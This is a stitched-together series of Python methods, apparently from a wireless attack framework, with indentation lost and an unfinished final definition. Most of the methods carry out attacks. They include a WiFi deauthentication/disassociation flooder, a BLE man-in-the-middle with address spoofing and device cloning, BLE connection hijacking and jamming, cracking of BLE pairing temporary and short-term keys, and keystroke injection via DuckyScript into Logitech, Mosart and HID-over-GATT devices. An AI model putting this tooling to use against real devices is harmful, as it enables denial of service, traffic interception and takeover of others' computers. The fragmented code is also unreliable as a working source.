def connect(self, packet):
if self.getStage() == BLEMitmStage.WAIT_CONNECTION:
io.success("Master connected : " + packet.srcAddr)
self.initiatorAddress = packet.srcAddr
self.initiatorAddressType = b"\x00" if packet.type == "public" else b"\x01"
if self.args["ADVERTISING_STRATEGY"] == "preconnect":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.sendp(ble.BLEDisconnect())
while self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
address = utils.addressArg(self.args["TARGET"])
connectionType = self.args["CONNECTION_TYPE"]
io.info("Connecting to slave " + address + "...")
self.a2sEmitter.sendp(
ble.BLEConnect(dstAddr=address,
type=connectionType,
initiatorType=packet.type))
while not self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
if self.args["ADVERTISING_STRATEGY"] == "flood":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
self.connectOnSlave(packet.type)
self.setStage(BLEMitmStage.ACTIVE_MITM)
io.info("Entering ACTIVE_MITM stage ...")
def send_deauth(self):
packet_count = utils.integerArg(self.args["COUNT"])
if packet_count == 0:
count = 0
while True:
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "deauthentication":
self.emitter.sendp(self.deauth_packet)
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "disassociation":
self.emitter.sendp(self.disas_packet)
utils.wait(seconds=0.05)
count += 1
if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']):
io.info("Sent {} deauthentication packets via {}".format(
count, self.args["INTERFACE"]))
else:
for count in range(packet_count):
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "deauthentication":
self.emitter.sendp(self.deauth_packet)
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "disassociation":
self.emitter.sendp(self.disas_packet)
utils.wait(seconds=0.05)
if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']):
io.info("Sent {} deauthentication packets via {}".format(
count, self.args["INTERFACE"]))
def show(self, packet):
if utils.booleanArg(self.args["ACK_PACKETS"]) or (
not utils.booleanArg(self.args["ACK_PACKETS"])
and not isinstance(packet, esb.ESBAckResponsePacket)):
io.displayPacket(packet)
self.lastReceivedFrameTimestamp = utils.now()
if self.pcap is not None:
self.pcap.sendp(packet)
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
if self.args["TEXT"] != "":
keystrokes = self.addMosartText(self.args["TEXT"])
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif self.args["DUCKYSCRIPT"] != "":
parser = DuckyScriptParser(filename=self.args["DUCKYSCRIPT"])
keystrokes = parser.generatePackets(
textFunction=self.addMosartText,
initFunction=self.startMosartInjection,
keyFunction=self.addMosartKeystroke,
sleepFunction=self.addMosartDelay)
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif utils.booleanArg(self.args["INTERACTIVE"]):
self.stop = False
self.watchKeyboard()
while not self.stop:
utils.wait(seconds=0.5)
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
def initEmittersAndReceivers(self):
if self.args["MITM_STRATEGY"] == "injection" and "butterfly" in self.args["INTERFACE"]:
sniffModule = utils.loadModule("ble_sniff")
sniffModule["INTERFACE"] = self.args["INTERFACE"]
sniffModule["SNIFFING_MODE"] = "newConnections"
sniffModule["TARGET"] = self.args["TARGET"]
sniffModule["MITMING"] = "yes"
output = sniffModule.execute()
if not output["success"]:
return False
else:
self.args["INTERFACE1"] = output["output"]["INTERFACE1"]
self.args["INTERFACE2"] = output["output"]["INTERFACE2"]
attackerToSlaveInterface = self.args["INTERFACE1"]
attackerToMasterInterface = self.args["INTERFACE2"]
self.a2sEmitter = self.getEmitter(interface=attackerToSlaveInterface)
self.a2sReceiver = self.getReceiver(interface=attackerToSlaveInterface)
self.a2mEmitter = self.getEmitter(interface=attackerToMasterInterface)
self.a2mReceiver = self.getReceiver(interface=attackerToMasterInterface)
if self.args["MITM_STRATEGY"] != "injection":
if not self.a2mEmitter.isAddressChangeable() and utils.booleanArg(self.args["SLAVE_SPOOFING"]):
io.warning("Interface "+attackerToMasterInterface+" is not able to change its address : "
"Address spoofing will not be enabled !")
return True
def onStart(self):
# Power Level between -100 and 20 dbm
if "TXPOWER" in self.module.args and utils.integerArg(
self.module.args['TXPOWER']) != None:
self.txPwLvl = struct.pack(
'<b', utils.integerArg(self.module.args['TXPOWER']))
else:
self.txPwLvl = struct.pack('<b', MOCK_VALUES['gatt']['txPower'])
# Local short name
if 'NAME' in self.module.args and self.module.args['NAME'] != '':
self.shortName = self.module.args['NAME'][0:10]
else:
self.shortName = MOCK_VALUES['gap']['localName']
if 'PAIRING' in self.module.args:
self.pairing = utils.booleanArg(self.module.args['PAIRING'])
else:
self.pairing = MOCK_VALUES['control']['enable_pairing']
if self.pairing:
self.module.pairing(active='passive')
self.addPrimaryService()
self.startAdv()
return True
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if utils.booleanArg(self.args["SHOW_CAPABILITIES"]):
self.displayCapabilities()
if "rfstorm" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
mode = self.emitter.getMode()
index = str(self.emitter.getDeviceIndex())
io.chart(["Interface","Device Index","Mode"],[[interface,"#"+index,mode]])
return self.ok({"INTERFACE":interface,
"INDEX":index,
"MODE":mode
})
elif ".pcap" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
mode = self.emitter.getMode()
io.chart(["Interface","Mode"],[[interface,mode]])
return self.ok({"INTERFACE":interface,
"MODE":mode
})
return self.nok()
def masterPairingRequest(self, pkt):
self.initiatorAddress = self.emitter.getCurrentConnection()
self.initiatorAddressType = b"\x00" if self.emitter.getCurrentConnectionMode(
) == "public" else b"\x01"
self.responderAddress = self.emitter.getAddress()
self.responderAddressType = b"\x00" if self.emitter.getAddressMode(
) == "public" else b"\x01"
pkt.show()
self.pairingRequest = pkt
self.pReq = self.pairingRequest.payload[::-1]
self.initiatorAuthReq = ble.AuthReqFlag(
data=bytes([pkt.authentication]))
self.initiatorInputOutputCapability = ble.InputOutputCapability(
data=bytes([pkt.inputOutputCapability]))
self.initiatorKeyDistribution = ble.KeyDistributionFlag(
data=bytes([pkt.initiatorKeyDistribution]))
keyboard = utils.booleanArg(self.args["KEYBOARD"])
yesno = utils.booleanArg(self.args["YESNO"])
display = utils.booleanArg(self.args["DISPLAY"])
ct2 = utils.booleanArg(self.args["CT2"])
mitm = utils.booleanArg(self.args["MITM"])
bonding = utils.booleanArg(self.args["BONDING"])
secureConnections = utils.booleanArg(self.args["SECURE_CONNECTIONS"])
keyPress = utils.booleanArg(self.args["KEYPRESS"])
linkKey = False
encKey = self.args["LTK"] != "" and self.args[
"EDIV"] != "" and self.args["RAND"] != ""
idKey = self.args["IRK"] != "" and self.args[
"ADDR"] != "" and self.args["ADDR_TYPE"]
signKey = self.args["CSRK"] != ""
self.responderInputOutputCapability = ble.InputOutputCapability(
keyboard=keyboard, display=display, yesno=yesno)
self.responderAuthReq = ble.AuthReqFlag(
ct2=ct2,
mitm=mitm,
bonding=bonding,
secureConnections=secureConnections,
keypress=keyPress)
self.responderKeyDistribution = ble.KeyDistributionFlag(
linkKey=linkKey, encKey=encKey, idKey=idKey, signKey=signKey)
self.pairingResponse = ble.BLEPairingResponse(
authentication=self.responderAuthReq.data[0],
inputOutputCapability=self.responderInputOutputCapability.data[0],
initiatorKeyDistribution=self.responderKeyDistribution.data[0],
responderKeyDistribution=self.responderKeyDistribution.data[0])
self.pairingResponse.show()
self.pRes = self.pairingResponse.payload[::-1]
pairingMethod = self.pairingMethodSelection()
io.success("Pairing Method selected : " + self.pairingMethod)
self.emitter.sendp(self.pairingResponse)
def run(self):
interface = self.args["INTERFACE"]
self.emitter = self.getEmitter(interface=interface)
if self.checkCapabilities():
if self.emitter.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
while self.emitter.isConnected():
utils.wait(seconds=0.01)
address = (self.emitter.getAddress()
if self.args["ADVERTISING_ADDRESS"] == "" else
utils.addressArg(self.args["ADVERTISING_ADDRESS"]))
if address != self.emitter.getAddress():
self.emitter.setAddress(address)
if utils.isHexadecimal(self.args["SCANNING_DATA"]):
scanningData = bytes.fromhex(self.args["SCANNING_DATA"])
else:
scanningData = b""
if utils.isHexadecimal(self.args["ADVERTISING_DATA"]):
advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"])
else:
advertisingData = b""
destAddress = ("00:00:00:00:00:00"
if self.args["DESTINATION_ADDRESS"] == "" else
utils.addressArg(self.args["DESTINATION_ADDRESS"]))
intervalMin = utils.integerArg(self.args["INTERVAL_MIN"])
intervalMax = utils.integerArg(self.args["INTERVAL_MAX"])
advertisingType = self.args["ADVERTISING_TYPE"].upper()
advertisingAddressType = "public" if self.args[
"ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random"
destinationAddressType = "public" if self.args[
"DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random"
self.emitter.setScanningParameters(data=scanningData)
self.emitter.setAdvertisingParameters(
type=advertisingType,
destAddr=destAddress,
data=advertisingData,
intervalMin=intervalMin,
intervalMax=intervalMax,
daType=advertisingAddressType,
oaType=destinationAddressType)
self.emitter.setAdvertising(
enable=utils.booleanArg(self.args["ENABLE"]))
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else -1
while time != 0:
utils.wait(seconds=1)
time -= 1
return self.ok({"INTERFACE": self.args["INTERFACE"]})
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to send advertisements.")
return self.nok()
def run(self):
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(self.args["PCAP_FILE"])
else:
self.pcap = None
self.initEmittersAndReceivers()
if self.args["LTK"] != "":
ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"]))
if utils.booleanArg(self.args["HIJACKING"]) and not self.checkHijackingCapabilities():
io.fail("Interfaces provided are not able to hijack a connection.")
return self.nok()
if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities():
io.fail("Interfaces provided are not able to jam a connection.")
return self.nok()
if self.args["SNIFFING_MODE"].upper() == "newConnections".upper():
if self.checkNewConnectionCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff new connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper():
if self.checkExistingConnectionCapabilities():
accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None
crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None
channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None
return self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap)
else:
io.fail("Interfaces provided are not able to sniff existing connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper():
if self.checkAdvertisementsCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff advertisements.")
return self.nok()
return self.ok()
def sniffNewConnections(self,target, channel):
if self.pcap is not None:
self.pcap.sniffNewConnections(address=target, channel=channel)
if len(self.receivers) == 1:
enabled,sweepingSequence = self.sweepingParameter()
if enabled:
self.receivers[0].setSweepingMode(enable=True,sequence=sweepingSequence)
self.receivers[0].sniffNewConnections(address=target, channel=channel)
self.receivers[0].onEvent("*", callback=self.show)
elif len(self.receivers) == 2:
self.receivers[0].sniffNewConnections(address=target,channel=37)
self.receivers[1].sniffNewConnections(address=target,channel=38)
self.receivers[0].onEvent("*", callback=self.show)
self.receivers[1].onEvent("*", callback=self.show)
elif len(self.receivers) == 3:
self.receivers[0].sniffNewConnections(address=target,channel=37)
self.receivers[1].sniffNewConnections(address=target,channel=38)
self.receivers[2].sniffNewConnections(address=target,channel=39)
self.receivers[0].onEvent("*", callback=self.show)
self.receivers[1].onEvent("*", callback=self.show)
self.receivers[2].onEvent("*", callback=self.show)
else:
io.fail("No sniffer detected !")
return self.nok()
while all([not receiver.isSynchronized() for receiver in self.receivers]):
utils.wait(seconds=0.001)
for receiver in self.receivers:
if receiver.isSynchronized():
self.displayConnection(self.receivers.index(receiver))
if ("microbit" in receiver.interface and
(utils.booleanArg(self.args["HIJACKING"]) or utils.booleanArg(self.args["JAMMING"]))):
receiver.removeCallbacks()
return self.sniffExistingConnections(
receiver,
receiver.getAccessAddress(),
receiver.getCrcInit(),
receiver.getChannelMap()
)
while all([receiver.isSynchronized() for receiver in self.receivers]):
utils.wait(seconds=0.05)
utils.wait(seconds=1)
return self.ok()
def onStart(self):
self.emitter = self.module.emitter
self.receiver = self.module.receiver
self.target = utils.addressArg(self.module.target)
self.lock = Lock()
io.info("Following mode disabled by the scenario.")
self.module.stopFollowing()
io.info("Generating attack stream ...")
attackStream = self.startLogitechInjection()
self.mode = None
if "TEXT" in self.module.args and self.module.args["TEXT"] != "":
self.mode = "text"
text = self.module.args["TEXT"]
io.info("Text injection: "+text)
attackStream += self.addLogitechDelay(duration=100)
attackStream += self.addLogitechText(text)
elif "INTERACTIVE" in self.module.args and utils.booleanArg(self.module.args["INTERACTIVE"]):
self.mode = "interactive"
io.info("Interactive mode")
self.keepAliveThread = wireless.StoppableThread(self.keepAlive)
self.keepAliveThread.start()
elif "DUCKYSCRIPT" in self.module.args and self.module.args["DUCKYSCRIPT"] != "":
self.mode = "duckyscript"
io.info("Duckyscript injection: "+self.module.args["DUCKYSCRIPT"])
parser = parsers.DuckyScriptParser(filename=self.args["DUCKYSCRIPT"])
attackStream = parser.generatePackets(
textFunction=self.addLogitechText,
initFunction=self.startLogitechInjection,
keyFunction=self.addLogitechKeystroke,
sleepFunction=self.addLogitechDelay
)
else:
io.fail("You must provide one of the following parameters:\n\tINTERACTIVE : live keystroke injection\n\tTEXT : simple text injection\n\tDUCKYSCRIPT : duckyscript injection")
self.module.stopScenario()
return True
io.info("Looking for target "+str(self.target)+"...")
while not self.emitter.scan():
utils.wait(seconds=0.1)
io.success("Target found !")
io.info("Injecting ...")
self.emitter.sendp(*attackStream)
if self.mode != "interactive":
while not self.emitter.isTransmitting():
utils.wait(seconds=0.5)
while self.emitter.isTransmitting():
utils.wait(seconds=0.5)
self.module.stopScenario()
return True
def dongleToDevice(self, pkt):
if self.stage != ESBMitmStage.SCAN:
if pkt.payload == b"" and self.stage == ESBMitmStage.DESYNC:
self.ackCount += 1
if self.ackCount >= 10:
io.success("Acknowledgment received on channel " +
str(self.dongleReceiver.getChannel()) + "!")
io.info("Entering ACTIVE_MITM stage ...")
self.setStage(ESBMitmStage.ACTIVE_MITM)
if self.stage == ESBMitmStage.ACTIVE_MITM:
self.ackPacket(pkt)
if utils.booleanArg(self.args["SHOW_ACK"]):
pkt.show()
def sniffExistingConnections(self, receiver,accessAddress, crcInit, channelMap):
if utils.booleanArg(self.args["JAMMING"]):
receiver.setJamming(enable=True)
if utils.booleanArg(self.args["HIJACKING_MASTER"]):
receiver.setHijacking(target="master",enable=True)
receiver.sniffExistingConnections(accessAddress,crcInit,channelMap )
if not utils.booleanArg(self.args["HIJACKING_MASTER"]):
receiver.onEvent("*", callback=self.show)
while not receiver.isSynchronized():
utils.wait(seconds=0.001)
self.displayConnection()
if utils.booleanArg(self.args["HIJACKING_MASTER"]):
io.info("Hijacking in progress ...")
while not receiver.isConnected():
utils.wait(seconds=0.001)
receiver.removeCallbacks()
return self.ok({"INTERFACE":receiver.interface})
else:
while receiver.isSynchronized():
utils.wait(seconds=0.001)
return self.ok()
def cloneStage(self,address,data,dataResponse,intervalMin, intervalMax,addrType):
io.info("Entering CLONE stage ...")
self.setStage(BLEMitmStage.CLONE)
if self.args["MITM_STRATEGY"] == "flood":
intervalMin = 200
intervalMax = 201
if utils.booleanArg(self.args["SLAVE_SPOOFING"]) and address != self.a2mEmitter.getAddress():
self.a2mEmitter.setAddress(address, random=addrType)
self.a2mEmitter.setScanningParameters(data=dataResponse)
self.a2mEmitter.setAdvertisingParameters(data=data, intervalMin=intervalMin, intervalMax=intervalMax, daType=addrType, oaType=addrType)
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("*",callback=self.scan)
accessPoints = {}
channel = 0
for i in range(utils.integerArg(self.args['TIME'])):
self.receiver.setChannel(channel+1)
self.emitter.sendp(wifi.WifiProbeRequest(srcMac = 'FF:FF:FF:FF:FF:FF', destMac= 'FF:FF:FF:FF:FF:FF', emitMac = "FF:FF:FF:FF:FF:FF"))
channel = (channel+1) % 14
utils.wait(seconds=1)
if utils.booleanArg(self.args["ACCESS_POINTS"]):
self.updateAccessPoints()
if utils.booleanArg(self.args["STATIONS"]):
self.updateStations()
output = self.generateOutput()
return self.ok(output)
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan and run in monitor mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkSniffingCapabilities():
self.target = "FF:FF:FF:FF" if self.args[
"TARGET"] == "" else self.args["TARGET"].upper()
if self.target == "FF:FF:FF:FF":
self.receiver.enterPromiscuousMode()
else:
self.receiver.enterSnifferMode(self.target)
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
if self.args["CHANNEL"] == "" or self.args["CHANNEL"].lower(
) == "auto":
while not self.find():
io.info("Retrying ...")
else:
self.receiver.setChannel(utils.integerArg(
self.args["CHANNEL"]))
self.receiver.onEvent("*", callback=self.show)
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
self.receiver.removeCallbacks()
if self.pcap is not None:
self.pcap.stop()
output = {}
output["MOUSE_FILE"] = self.args["MOUSE_FILE"]
output["PCAP_FILE"] = self.args["PCAP_FILE"]
output["TARGET"] = self.target
output["CHANNEL"] = str(int(self.receiver.getChannel()))
return self.ok(output)
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in sniffing mode.")
return self.nok()
def initEmittersAndReceivers(self):
attackerToSlaveInterface = self.args["INTERFACE1"]
attackerToMasterInterface = self.args["INTERFACE2"]
self.a2sEmitter = self.getEmitter(interface=attackerToSlaveInterface)
self.a2sReceiver = self.getReceiver(interface=attackerToSlaveInterface)
self.a2mEmitter = self.getEmitter(interface=attackerToMasterInterface)
self.a2mReceiver = self.getReceiver(
interface=attackerToMasterInterface)
if not self.a2mEmitter.isAddressChangeable() and utils.booleanArg(
self.args["SLAVE_SPOOFING"]):
io.warning("Interface " + attackerToMasterInterface +
" is not able to change its address : "
"Address spoofing will not be enabled !")
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if utils.booleanArg(self.args["SHOW_CAPABILITIES"]):
self.displayCapabilities()
interface = self.args["INTERFACE"]
address = self.emitter.getAddress()
mode = self.emitter.getMode()
channel = self.emitter.getChannel()
io.chart(["Interface", "MAC Address", "Mode", "Channel"],
[[interface, address, mode, channel]])
return self.ok({
"INTERFACE": interface,
"ADDRESS": address,
"MODE": mode,
"CHANNEL": channel
})
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if utils.booleanArg(self.args["SHOW_CAPABILITIES"]):
self.displayCapabilities()
if "rzusbstick" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
index = str(self.emitter.getDeviceIndex())
serial = str(self.emitter.getSerial())
firmwareVersion = str(self.emitter.getFirmwareVersion())
mode = str(self.emitter.getMode())
io.chart(["Interface","Device Index","Serial number","Firmware Version", "Mode"],[[interface,"#"+index,serial, firmwareVersion, mode]])
return self.ok({"INTERFACE":interface,
"INDEX":index,
"SERIAL":serial,
"FIRMWARE_VERSION":firmwareVersion,
"MODE":mode
})
elif "hackrf" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
index = str(self.emitter.getDeviceIndex())
serial = str(self.emitter.getSerial())
firmwareVersion = str(self.emitter.getFirmwareVersion())
apiVersionMajor,apiVersionMinor = self.emitter.getAPIVersion()
apiVersion = str(apiVersionMajor)+"."+str(apiVersionMinor)
boardName = self.emitter.getBoardName()
boardID = str(self.emitter.getBoardID())
io.chart(["Interface","Device Index","Serial number","Board Name", "Board ID","Firmware Version", "API Version"],[[interface,"#"+index,serial,boardName, boardID,firmwareVersion, apiVersion]])
return self.ok({"INTERFACE":interface,
"INDEX":index,
"SERIAL":serial,
"FIRMWARE_VERSION":firmwareVersion,
"API_VERSION":apiVersion,
"BOARD_NAME":boardName,
"BOARD_ID":boardID
})
elif ".pcap" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
mode = self.emitter.getMode()
io.chart(["Interface","Mode"],[[interface,mode]])
return self.ok({"INTERFACE":interface,
"MODE":mode
})
return self.nok()
def show(self,packet):
advMode = self.args["SNIFFING_MODE"].upper() == "advertisements".upper()
isAnAdv = isinstance(packet, ble.BLEAdvertisement)
isAnEmpty = isinstance(packet,ble.BLEEmptyPDU)
unknownInName = "Unknown" in packet.name
isConnectReq = isinstance(packet,ble.BLEConnectRequest)
addressMatching = ( isConnectReq
and packet.addr == utils.addressArg(self.args["TARGET"])
or self.args["TARGET"] == ""
or (hasattr(packet,"addr") and packet.addr == utils.addressArg(self.args["TARGET"])))
if (
(not advMode and (not isAnAdv or isConnectReq) and not isAnEmpty and not unknownInName)
or (advMode and isAnAdv and addressMatching)
):
self.onPacket(packet)
if self.pcap is not None:
self.pcap.sendp(packet)
if utils.booleanArg(self.args["CRACK_KEY"]):
if isConnectReq:
self.initiatorAddress = packet.srcAddr
self.initiatorAddressType = packet.srcAddrType
self.responderAddress = packet.dstAddr
self.responderAddressType = packet.dstAddrType
if isinstance(packet, ble.BLEPairingRequest):
self.pReq = packet.payload[::-1]
if isinstance(packet,ble.BLEPairingResponse):
self.pRes = packet.payload[::-1]
if isinstance(packet,ble.BLEPairingConfirm) and self.mConfirm is None:
self.mConfirm = packet.confirm[::-1]
if isinstance(packet,ble.BLEPairingRandom) and self.mRand is not None and self.sRand is None:
self.sRand = packet.random[::-1]
while self.temporaryKey is None and not self.failure:
pass
if self.failure:
self.errorDuringCracking()
else:
io.info("Derivating Short Term Key ...")
self.shortTermKey = ble.BLECrypto.s1(self.temporaryKey,self.mRand,self.sRand)[::-1]
io.success("Short Term Key found : "+ self.shortTermKey.hex())
ble.BLELinkLayerCrypto.provideLTK(self.shortTermKey)
if isinstance(packet,ble.BLEPairingRandom) and self.mRand is None:
self.mRand = packet.random[::-1]
self.failure = not self.crackTemporaryKey()
def scanStage(self,packet):
if utils.booleanArg(self.args["SHOW_SCANNING"]):
packet.show()
if self.getStage() == BLEMitmStage.SCAN:
if utils.addressArg(self.args["TARGET"]) == packet.addr.upper():
if packet.type == "ADV_IND":
io.success("Found corresponding advertisement !")
self.address = utils.addressArg(self.args["TARGET"])
data = packet.getRawDatas()
self.intervalMin = packet.intervalMin
self.intervalMax = packet.intervalMax
self.addrType = packet.addrType
self.dataAdvInd = data
elif packet.type == "SCAN_RSP":
self.dataScanRsp = packet.getRawDatas()
if self.dataAdvInd is not None and self.dataScanRsp is not None:
self.cloneStage(self.address,self.dataAdvInd,self.dataScanRsp,self.intervalMin,self.intervalMax,self.addrType)
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("*", callback=self.updateDevices)
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
if startChannel != endChannel:
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
if utils.booleanArg(self.args["ACTIVE"]):
self.emitter.sendp(
zigbee.ZigbeeBeaconRequest(sequenceNumber=1,
destPanID=0xFFFF,
destAddr=0xFFFF))
utils.wait(seconds=0.1)
i = (i + 1) % len(channels)
if startChannel != endChannel:
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) == 0:
return self.nok()
else:
return self.generateOutput()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff and inject frames.")
return self.nok()
def onStart(self):
self.emitter = self.module.emitter
self.receiver = self.module.receiver
self.server = self.module.server
self.mode = "text"
self.enableAdvertising()
self.initializeServices()
if "PAIRING" in self.module.args and self.module.args["PAIRING"].lower(
) == "passive":
self.module.pairing(active="passive")
io.info("Generating attack stream ...")
self.attackStream = self.startHIDoverGATTInjection()
self.mode = None
if "TEXT" in self.module.args and self.module.args["TEXT"] != "":
self.mode = "text"
text = self.module.args["TEXT"]
io.info("Text injection: " + text)
self.attackStream += self.addHIDoverGATTText(text)
io.info("You can start the injection by pressing [SPACE]")
elif "INTERACTIVE" in self.module.args and utils.booleanArg(
self.module.args["INTERACTIVE"]):
self.mode = "interactive"
io.info("Interactive mode")
elif "DUCKYSCRIPT" in self.module.args and self.module.args[
"DUCKYSCRIPT"] != "":
self.mode = "duckyscript"
io.info("Duckyscript injection: " +
self.module.args["DUCKYSCRIPT"])
parser = parsers.DuckyScriptParser(
filename=self.args["DUCKYSCRIPT"])
self.attackStream = parser.generatePackets(
textFunction=self.addHIDoverGATTText,
initFunction=self.startHIDoverGATTInjection,
keyFunction=self.addHIDoverGATTKeystroke,
sleepFunction=self.addHIDoverGATTDelay)
io.info("You can start the injection by pressing [SPACE]")
return True
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if utils.booleanArg(self.args["SHOW_CAPABILITIES"]):
self.displayCapabilities()
if "irma" in self.args["INTERFACE"]:
interface = self.args["INTERFACE"]
index = str(self.emitter.getDeviceIndex())
port = self.emitter.getSerialPort()
frequency = str(self.emitter.getFrequency())
io.chart(["Interface", "Device Index", "Serial Port", "Frequency"],
[[interface, "#" + index, port, frequency + " kHz"]])
return self.ok({
"INTERFACE": interface,
"INDEX": index,
"PORT": port,
"FREQUENCY": frequency
})
return self.nok()
def run(self):
self.receiver = self.getReceiver(self.args["INTERFACE"])
self.receiver.enterPromiscuousMode()
if self.checkPromiscuousSniffingCapabilities():
self.receiver.onEvent("*", callback=self.add)
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
utils.wait(seconds=0.1)
self.displayDevices()
i = (i + 1) % len(channels)
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) >= 1:
return self.ok(self.generateOutput())
else:
return self.nok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in promiscuous mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.pcapReceiver = self.getReceiver(
interface=self.args["PCAP_FILE"])
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
def run(self):
